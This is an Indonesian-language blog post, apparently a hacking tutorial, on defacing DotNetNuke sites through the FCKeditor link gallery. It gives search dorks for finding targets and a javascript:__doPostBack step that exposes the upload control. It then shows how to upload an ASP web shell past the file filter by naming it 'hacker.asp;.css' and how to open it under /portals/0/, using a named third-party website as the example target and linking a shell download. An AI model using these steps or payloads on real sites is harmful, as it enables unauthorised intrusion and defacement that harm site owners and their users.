inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya
klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx
di sini ane menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..
sehingga akan menjadi seperti ini :
http://www.pivocom.com/Providers/Htm...nkgallery.aspx
setelah nge klik itu, tnggu loading selesai baru kamu harus klik
(File A file on your site)
dan ganti alamat protocol website nya jadi :
javascript:__doPostBack('ctlURL$cmdUpload','' )
ntar keluar sendiri tuh, tombol browse ny kya gini..
klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?72blav74ddvdtea
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"
upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]
nah..abis itu agan ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/agarirs.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/
Tidak ada komentar:
Posting Komentar